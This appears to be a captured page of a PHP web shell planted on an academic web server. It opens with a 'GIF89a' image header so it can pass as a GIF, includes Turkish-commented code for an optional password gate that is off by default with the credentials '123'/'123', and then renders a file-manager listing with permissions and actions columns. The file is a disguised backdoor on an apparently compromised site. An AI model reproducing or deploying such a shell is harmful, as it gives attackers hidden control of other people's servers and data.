GIF89a;
# Konfigurasyon
$sayfaSifreleme ='0'; # 1 acik , 0 kapali
$kullaniciAdi = '123';
$sifre = '123';
# yetki kontrol fonksiyonu
function yetkiKontrol($kullaniciAdi,$sifre) {
if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") {
header('WWW-Authenticate: Basic realm="x"');
die(header('HTTP/1.0 401 Unauthorized'));
}
}
# Sayfa Sifreleme aciksa
if($sayfaSifreleme =='1') {
# Veri ve sifre kontrolu
yetkiKontrol($kullaniciAdi,$sifre);
}
?>
eclass.unmer.ac.id
| Name |
Size |
Modified |
Perms |
Actions |
| 00.0 |
256 bytes |
October 30 2025 22:14:12. |
0644 |
|
|
| 01.0 |
256 bytes |
October 30 2025 22:14:12. |
0644 |
|
|
| 01.1 |
256 bytes |
October 30 2025 22:14:12. |
0644 |
|
|
| 01.2 |
256 bytes |
October 30 2025 22:14:12. |
0644 |
|
|
| 01.3 |
256 bytes |
October 30 2025 22:14:12. |
0644 |
|
|
| 03.0 |
256 bytes |
October 30 2025 22:14:12. |
0644 |
|
|
| 05.0 |
256 bytes |
October 30 2025 22:14:12. |
0644 |
|
|
| 08.0 |
256 bytes |
October 30 2025 22:14:12. |
0644 |
|
|
| 12.0 |
256 bytes |
October 30 2025 22:14:12. |
0644 |
|
|
| 1e.0 |
256 bytes |
October 30 2025 22:14:12. |
0644 |
|
|
| 1f.0 |
256 bytes |
October 30 2025 22:14:12. |
0644 |
|
|